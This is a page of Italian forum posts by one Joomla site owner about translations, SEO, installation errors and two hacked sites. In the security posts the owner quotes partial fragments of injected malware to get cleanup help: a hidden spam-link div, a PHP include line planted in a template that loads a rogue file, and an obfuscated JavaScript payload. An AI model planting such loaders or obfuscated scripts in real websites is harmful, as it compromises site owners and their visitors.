Visualizza post

Questa sezione ti permette di visualizzare tutti i post inviati da questo utente. N.B: puoi vedere solo i post relativi alle aree dove hai l'accesso.


Post - davide73

Pagine: 1 [2] 3 4 5 6
21
Gestione e-commerce / La traduzione che manca!!
« il: 10 Dic 2014, 20:33:02 »
Ciao,
usando un Joomla 2.5 e un Virtuemart 2.6.12 (tutto aggiornato) incappo spesso in errori di visualizzazione degli errori o degli avvisi (mi succede con più siti):

ad esempio, ma non è l'unica cosa (in realtà su vari siti mi succede e con vari componenti/moduli), esempio:

avendo abilitato la registrazione standard di Joomla, quando apro il carrello con un utente che è registrato solo in Joomla User (quindi non ha impostato indirizzo telefono etc. in VM), il carrello genera una lista di cose che mancano al profilo utente (cosa buona e giusta):

Missing value for Codice Fiscale
Missing value for Nome
Missing value for Cognome
Missing value for indirizzo 1 .... bla bla bla


ecco il problema è che scrive in inglese !!! AZZ !!!

allora io vado a verificare che il file it-IT.com_virtuemart.ini sia corretto e correttamente inserito in root/languages/it-IT ... e c'è e la traduzione esiste:

COM_VIRTUEMART_MISSING_VALUE_FOR_FIELD="Valore mancante per %s"

allora ad un certo punto ho detto: mo cambio il file in inglese cribio!! e così ho fatto ma tuttavia la scritta di avviso resta in inglese !!! ari AZZ!!!

quindi mi inizio a chiedere ma gli avvisi Virtuemart 2.x da dove cavolo li prende!!??

ad esempio, più o meno la stessa cosa, mi accade con il modulo (bello a mio avviso) di RokSprocket pur inserendo il file in italiano il "leggi tutto" me lo da in inglese .. anche qui ho molti punti interrogativi ?????

sperando che abbia spiegato bene la problematica, mi domando se un Guru del Forum mi da delle dritte per intervenire ... grazie raga!!! io attendo fiducioso ...

Davide.

22
Sicurezza / Hacked website !! ?? (Risolto)
« il: 29 Ott 2014, 12:22:50 »
TUTTO RISOLTO


visita: http://www.sitoalsicuro.it/

23
Ciao a tutti.


in Joomla 2.5.11 in amministrazione da gestione Plugin, appena clicco su un Plugin qualunque ottengo questo errore:


500 - Si è verificato un errore.

[/size]Layout edit_options non trovato
[/size]
[/size]ho attivato il Debug è mi porta i seguenti errori:

Call stack
#   Function   Location
1   JAdministrator->dispatch()   /home/mhd-01/www.xxxxxx.it/htdocs/administrator/index.php:46
2   JComponentHelper::renderComponent()   /home/mhd-01/www.xxxxxx.it/htdocs/administrator/includes/application.php:153
3   JComponentHelper::executeComponent()   /home/mhd-01/www.xxxxxx.it/htdocs/libraries/joomla/application/component/helper.php:351
4   require_once()   /home/mhd-01/www.xxxxxx.it/htdocs/libraries/joomla/application/component/helper.php:383
5   JController->execute()   /home/mhd-01/www.xxxxxx.it/htdocs/administrator/components/com_plugins/plugins.php:18
6   PluginsController->display()   /home/mhd-01/www.xxxxxx.it/htdocs/libraries/joomla/application/component/controller.php:761
7   JController->display()   /home/mhd-01/www.xxxxxx.it/htdocs/administrator/components/com_plugins/controller.php:48
8   PluginsViewPlugin->display()   /home/mhd-01/www.xxxxxx.it/htdocs/libraries/joomla/application/component/controller.php:722
9   JView->display()   /home/mhd-01/www.xxxxxx.it/htdocs/administrator/components/com_plugins/views/plugin/view.html.php:38
10   JView->loadTemplate()   /home/mhd-01/www.xxxxxx.it/htdocs/libraries/joomla/application/component/view.php:205
11   include()   /home/mhd-01/www.xxxxxx.it/htdocs/libraries/joomla/application/component/view.php:649
12   JView->loadTemplate()   /home/mhd-01/www.xxxxxx.it/htdocs/administrator/components/com_plugins/views/plugin/tmpl/edit.php:77
13   JError::raiseError()   /home/mhd-01/www.xxxxxx.it/htdocs/libraries/joomla/application/component/view.php:660
14   JError::raise()   /home/mhd-01/www.xxxxxx.it/htdocs/libraries/joomla/error/error.php:251


il sito è su ... non lo posso dire vero?
comunque è installato di fresco e ho installato un template che lavora con un Framework JA T3 in versione 2.5.1


avete un aiuto da darmi?


grazie ....

24
Joomla! 1.5 / Re:La 1.5.26 è sicura?
« il: 26 Mag 2013, 14:12:31 »
Ciao,


molto gentili faccio tesoro e applico i vostri consigli!!  ;D


inoltre ho chiesto lumi anche al Provider per vedere se lato Server esistono problemi ...


qualora dovessi capire realmente da dove sono entrati lo posto per conoscenza agli altri.


Saluti e buona domenica a tutti.


Davide.

25
Joomla! 1.5 / La 1.5.26 è sicura?
« il: 23 Mag 2013, 13:48:51 »
Ciao,

ho un sito con la 1.5.26 con all'interno i seguenti moduli e componenti di terza parte:

Communicator 2.0.4
JoomFish 2.2.3

mod_AutsonSlideShow 1.2
communicatorsubscribe 2.0.3
jv_facebook 1.5.3
mod_jw_sir 1.2

il tutto è su un Template a pagamento di una azienda americana di cui non scrivo il nome (mi pare che qui non si possano nominare cose a pagamento), ma regolarmente acquistato e con la quale ho molti siti con le loro template.

di fatto all'interno degli articoli (pagine) ho rilevato il seguente codice:
ne posto solo l'inizio:

<div id="J#1368173419bl389795a1"><p>Возможна причина в том, что я слишком мало уделял внимания изучению этой темы.</p><p>И она решила в конце концов, что для тебя будет лучше пожить с монахинями.</p><p>Он начал двигаться в противоположную от лагеря сторону, направляясь на восток, параллельно горному хребту, возле которого я работал.</p><p>Добрый вечер, сдержанно &quot;<a href='#' title='нефорспит игра скачать'>Нефорспит игра скачать[/url]</div><script type="text/javascript"> document.getElementById("J#1368173419bl389795a1").style.display = "none";</script>

ho oscurato il link con # e questa è solo mezza riga, ma certamente il codice che ho trovato è molto più lungo.

la domanda è: da dove sono entrati?

mi risulta che Joomla 1.5.26 sia stabile pertanto penso che la strada sia da uno dei moduli componenti sopra citati, voi che ne pensate?

resto in attesa, di certo ho ripulito il sito, ma prima di eliminare componenti o moduli volevo il parere di uno esperto.

26
Ciao,
 
ho la template di rikettheme Quasar (ma anche con altre della stessa produzione) e il plugin per facebook, twitter fb_tw_plus1  http://extensions.joomla.org/extensions/social-web/republish/18072 e i social insomma, che funziona bene su tutti i browser meno che su IE7 (non so su altre versioni se va) che potrebbe essere?
 
qualcuno ci ha già sbattuto è ha una dritta?
 
grazie come sempre.
 
Buona giornata ragazzi e ragazze.

27
Cosi da ignorante:

se ottieni un errore 500 vuol dire che su tuo isp qualcosa ne blocca la installazione.

Prima cosa che farei, un tiket ....

per installare manualmente un componente ne devi seguire la sua logica, cosa abbastanza facile leggendo il file XML incluso nel pacche di installazione, e sicuramente dovrai anche fare un intervento per creare le tabelle sul tuo data base

alla fine se non hai pratica, meglio chiedere al tuo provider spiegazioni.

Ciao

28
SEO / Re:Google news + XMAP + Nome di pubblicazione
« il: 14 Nov 2010, 14:26:12 »
A seguito di varie ricerche ho trovato il giusto link, che ne qui ne sul forum di google mi hanno segnalato pertanto lo segnalo:

link al modulo per le richieste di variazione al proprio sito come il titolo o anche l'URL e che vanno segnalati all'assistenza:

http://www.google.it/support/news_pub/bin/request.py?contact_type=report_update&hl=it

Ringrazio: http://www.dd2006.net

29
SEO / Re:Google news + XMAP + Nome di pubblicazione
« il: 10 Nov 2010, 20:04:42 »
ho riproposto questa domanda sui forum di Google cosi vedo se si riesce a fare qualcosa.

In giro non riesco a trovare nulla su la scritta BLOG e come si toglie da google news.

aggiorno anche qui se scopro come ......

30
Sicurezza / Re:Sito bucato?
« il: 09 Nov 2010, 22:37:07 »
Ringraziando M. per l'attenzione e il post scritto, a seguire la mia esperienza che magari serva a qualcuno:

innanzitutto, non so come sono entrati, probabilmente la versione non aggiornata del core, quindi importante è aggiornare (me lo dico ovviamente anche da solo).

Verificare eventuali aggiornamenti dei moduli e componenti e plugin etc installati.

Anche se poi magari è per colpa del mio ISP che non nomino per ovvie ragioni.

Comunque:

1. hanno inserito uno script che richiamava un modulo sempre da loro inserito nel file INDEX.PHP della template in uso.

Ovviamente tale richiamo và eliminato, nel mio caso visto che comunque con attenzione mantengo un backup dei file e del DB in locale, è stato veole rimettere il MIO file originale.

Và comunque letto ed intepretato lo script per capire cosa fa, in questo caso è stato facile:

<?php @include_once("./".preg_replace("/[^\/]*\//","../",preg_replace("/^\//","",preg_replace("/[^\/]+$/","",$_SERVER["REQUEST_URI"])))."./".preg_replace("/[^\/]*\//","../",preg_replace("/^\//","",preg_replace("/[^\/]+$/","",$_SERVER["REQUEST_URI"])))."./".preg_replace("/[^\/]*\//","../",preg_replace("/^\//","",preg_replace("/[^\/]+$/","",$_SERVER["REQUEST_URI"])))."/modules/com_k2/copy_right.php");?>

dove chiaramente bisogna seguire e leggere il file copy_right.php e quindi da questo vedere cosa ealtro è implicato.

Inoltre c'era questo strano script nelle prime righe tra i tag <head>:

ne scrivo solo l'inizio:
type="text/javascript"> <!--         $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"        \\"+$.__$+$.$$_+$.___+$.$_$_+"\\"+$.__$+$.$__+$.$$$+$.$$$_+"_"+(![]+"")[$._$_]+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.__$+$.$_$+$._$$+"\\"+$.__$+$.$$_+$._$$+" \\"+$.$$$+$.$_$+" []\\"+$.$$$+$._$$+"\\"+$.__$+$._$_+"        "+$.$$$$+$._+"\\"+$.__$+$.$_$+$.$$_+$.$$__+$.__+"\\"+$.__$+$.$_$+$.__$+$._$+"\\"+$.__$+$.$_$+$.$$_+" \\"+$.__$+$.$$_+$._$$+$.$$$_+$.__+"\\"+$.__$+$.___+$.$$$+(![]+"")[$._$_]+$._$+$.$_$$+$.$_$_+(![]+"")[$._$  etc.

2. erano state inserite 2 cartelle nella cartella modules: com_comprofiles e mod_k2

ovviamente ho rimosso tutto il loro contenuto dal server, cosi che non ho più gli strani link tra le mie pagine.

Sicuramente l'unico scopo e di tipo SEO al fine che gli si indicizzino link sfruttando il tuo sito, considerate che all'interno delle funzioni è calcolato che vengano presi 244 caratteri (circa 20 link) alla volta da un file di testo txt che pesava oltre 5mb, il chè significa: una enormità di link!! e che io nelle pagine del sito non li vedevo e tanto meno nel pannello.

Adesso ho reinviato la sitemap a Google sperando che cancelli quanto prima le indicizzaioni fatte a quei link INVADENTI ripulendo la mia chache, lo faro anche su Yahoo, Ask e Bing che sono i motori che mi risultano più intelligenti e con gli strumenti per farlo! se conoscete altri motori con attenzione ai webmaster ditemeli che ci passo!!

Me ne sono accorto grazie al comando site:www.xxxx.com da google che mi porta oltre 500 link su un sito di 30/40 pagine, strano no??

Spero che questo post sia di aiuto, mentre invito il moderatore qual'ora io abbia commesso un abuso ho abbia sbagliato inserendo script e dettagli di cancellarlo o avvisarmi che lo cancello.

Saluti e meno male che me andata bene sta volta và ........

31
Sicurezza / Sito bucato?
« il: 09 Nov 2010, 10:09:16 »
Ciao,

facendo una analisi su google ho scoperto che nell'indice compaiono pagine non inerenti al sito, che hanno link del tipo a seguire:

modules/com_comprofiler/fruit-of-the-loom-tees-p-943.html

adesso però accedendo al back-end non vendo nulla di strano ed il sito fnziona comunque correttamente "apparentemente"

la versione e vecchia: 1.5.12

ed installato oltre a joomla c'è Frontpage SlideShow e Joomap

dove e come posso eliminare l'errore, oltre ovviamente ad aggiornare la mia versione del core?

da dove sono entrati che io non uso comunity builder?

saluti e grazie delle risposte. Davide.

32
SEO / Google news + XMAP + Nome di pubblicazione
« il: 02 Nov 2010, 00:41:21 »
Ciao a tutti,

ho 2 piccoli quesiti:

1. ricevo errore da google news sulla sitemap generata con XMAP:

Errore: "Nome di pubblicazione non previsto"
ho letto che trattasi del campo N:NAME che in effetti non mi corrisponde al nome con il quale il sito è registrato su google news, come si cambia questo parametro con XMAP ?

2. su google news vengo scritto come: Nome Sito (Blog)

come diavolo si fà per cancellare quella scritta blog tra parentesi (Blog) ??

Visto che non si tratta di un blog ma di un sito di informazione la dicitura che google news mi ha addossato di suo mi penalizza e vengo sicuramente meno cliccato.

Resterò in attesa del vostro cortese aiuto e saluto tutti!!!.

Davide

33
SEO / Re:Url amichevoli e pure google msn yahoo
« il: 12 Lug 2010, 14:14:04 »
Insomma si vince soltanto su Google?

34
SEO / Re:Url amichevoli e pure google msn yahoo
« il: 09 Lug 2010, 11:15:23 »
Grazie per l'attenzione.

certo fin qui ok ma alla fine la domanda interessante era:

inserisco la mappa in 3 motori msn yahoo e google, soltanto google la premia: perchè?

nei confronto di nsn (bing) e yahoo che caspita bisogna fare affinché portino qualche visita?

35
SEO / Re:Url amichevoli e pure google msn yahoo
« il: 03 Lug 2010, 02:35:57 »
Caspita raga di due quesiti neanche una drtta!!??

ciao :D

36
Ciao,

considera ché anzi tutto  devi verificare che il tuo server sia linux e di avede almeno un db mysql per essere in linea con quanto necessario all'uso di joomla.

Detto questo il server prevede che vengano laciati in sequenza i seguenti file:
index.html (molto probabilmente il tuo file attuale)
index.php (il file che lancia joomla)

quindi puoi caricare e installare joomla che comunque non sarebbe visibile affinché esiste il file index.html.

Altra e ultima considerazione per il momento:
dovrai fare anche attenzione a che non ti si mischino file joomla con i tuoi attuali ad es. (quelle più comuni) la cartella css e la cartella images.

Altra soluzione può essere quella di installare il sito by joomla in una sottocartella del tuo server che verrà raggiunta tipo mioweb.it/mia-cartella-joomla quando sarà pronto con una piccola modifica la file htacess (che inserirai nella root) reidirizzi miosito.it verso la cartella di joomla.

Ciao!

37
SEO / Re:Title nelle voci di menu
« il: 26 Giu 2010, 23:16:58 »
m.davide hi hi io sono davide .........

tolto la omonimia se ho ben capito devi agire facilmente cosi:

nuova voce menu > aspetto articolo (o quello che ti serve ovviamente) > nel menu lato destro:

parametri sistema > titolo pagina !

cio che li scrivi diventa il tag title, puoi anche scegliere se il titolo lo vuoi a vista nella pagina o no.

Spero che avevo ben intuito cosa chiedevi ...

ciao Davide!!!!!

38
SEO / Re:traking Bing
« il: 26 Giu 2010, 23:09:29 »
Personalmente non trovo favorevole l'utilizzo delle exstension moduli plugin etc. a me che mi piace avere JOOMLA quanto più sobrio possibile per mille ragioni, per autenticare gli account aggiungo semplicemente il file sul server e sono sempre okay!.

Google yahoo e msn prevedono o il tag oppure un file di 1k per l'autenticazione.

Ciao!

39
SEO / Re:metadata e keyword (ma servono davvero?)
« il: 26 Giu 2010, 23:03:13 »
Io penso e dichiaro che la moggior parte dei motori è oramai prepara a effettuare scansione direttamente da quello che il <body> corpo pagina ma in molti casi una corretta compilazione dei meta aiuta:

anzi tutto la description come noto e anche visibile agli utenti nelle liste dei motori pertanto generarne uno differente per ogni pagina aiuta i termini fondamentali a salire e imboccare le parole chiavi desiderate con il tag keywords aumenta la possibilità di alzarle ulteriormente.

Tutto provato sulle mie indicizzaioni, dove non ho curato questi piccoli particolari ho preso meno di dove invece ho "perso" un po di tempo.

Fondamentale di certo il tag TITLE che secondo mio avviso è il principale riferimento per le indicizzazioni in generale, ovviamente meno script possibili, pagine pulite tag chiusi regolamente contenuti decrittivi inteligenti e via dicendo .... un buon sito prende sempre più piede di un sito dove non c'è dedizione e attenzione.

Saluti cari a tutti!

40
SEO / Url amichevoli e pure google msn yahoo
« il: 26 Giu 2010, 19:02:15 »
Ciao a tutti,

facile che i miei siano argomenti stupidi e triti e mi scuso anticipatamente.

1. friendly url componente base di joomla:

a parte che a me sembra sufficiente per ottenere una lettura facile della path ma mi domando come ragiona:
se inserisco un link in un menu il nomefile.html corrisponde esattamente a alias della voce di menu stessa ... fantastico

ma quando essi sono frutto dell'inserimento di un articolo in una categoria che poi linko come aspetto categoria diventano ad es. /nome-categoria/98/nome-del-alias-utente.html
 altre volte diventano: nome-categoria/nome-o-titolo-articolo.html
come si fà a fare in modo che siano sempre nome articolo.html ??

grazie ragazzi ....

Google Msn e Yahoo

allora provo ad andare per vie veloci (forse servivano 2 post?!)

sono iscritto a tutti e tre o servizi per webmaster previsti dai motori, a tutti e tre invio mappe etc. ma solo google mi felicita .....

1. i componenti come joomap che generano la sitemap xml per google, quando lo stesso file lo invio anche a gli altri: PENALIZZA ?? o va bene comunque?

2. come diavolo è che google mi indicizza e magari mi posiziona buone parole in cima e gli altri 2 mi vedono pochissimo e pur uscendo vengo sempre fuori "male"??

che se deve fare per avere consenso da msn (bing) e il network di yahoo?

grazie mille se vorrete togliermi qualche ? ...

Saluti Davide Roma.

Pagine: 1 [2] 3 4 5 6
Host

Torna su